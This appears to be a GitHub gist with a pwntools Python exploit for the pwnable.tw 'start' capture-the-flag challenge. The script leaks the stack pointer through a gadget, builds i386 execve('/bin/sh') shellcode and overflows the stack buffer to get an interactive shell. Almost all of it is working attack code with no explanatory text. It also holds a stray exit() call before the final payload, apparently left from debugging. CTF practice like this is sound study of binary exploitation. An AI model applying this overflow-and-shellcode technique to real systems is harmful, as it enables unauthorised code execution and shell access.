Skip to content

Instantly share code, notes, and snippets.

@morentharia
Created November 14, 2019 21:52
Show Gist options
  • Save morentharia/75c19bcd667ed5bc9233433554582eb8 to your computer and use it in GitHub Desktop.
Save morentharia/75c19bcd667ed5bc9233433554582eb8 to your computer and use it in GitHub Desktop.
from pwn import *
# 0x08048087 mov ecx, esp
# 0x08048089 mov dl, 0x14
# 0x0804808b mov bl, 1
# 0x0804808d mov al, 4
def leak_esp(r):
address_1 = p32(0x08048087)
payload = 'A'*20 + address_1
print r.recvuntil('CTF:')
r.send(payload)
esp = u32(r.recv()[:4])
print "Address of ESP: ", hex(esp)
return esp
shellcode = asm('\n'.join([
'push %d' % u32('/sh\0'),
'push %d' % u32('/bin'),
'xor edx, edx',
'xor ecx, ecx',
'mov ebx, esp',
'mov eax, 0xb',
'int 0x80',
]))
if __name__ == "__main__":
context.arch = 'i386'
# r = remote('chall.pwnable.tw', 10000)
r = process("./start")
gdb.attach(r)
esp = leak_esp(r)
exit()
payload = "A"*20 + p32(esp + 20) + shellcode
r.send(payload)
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment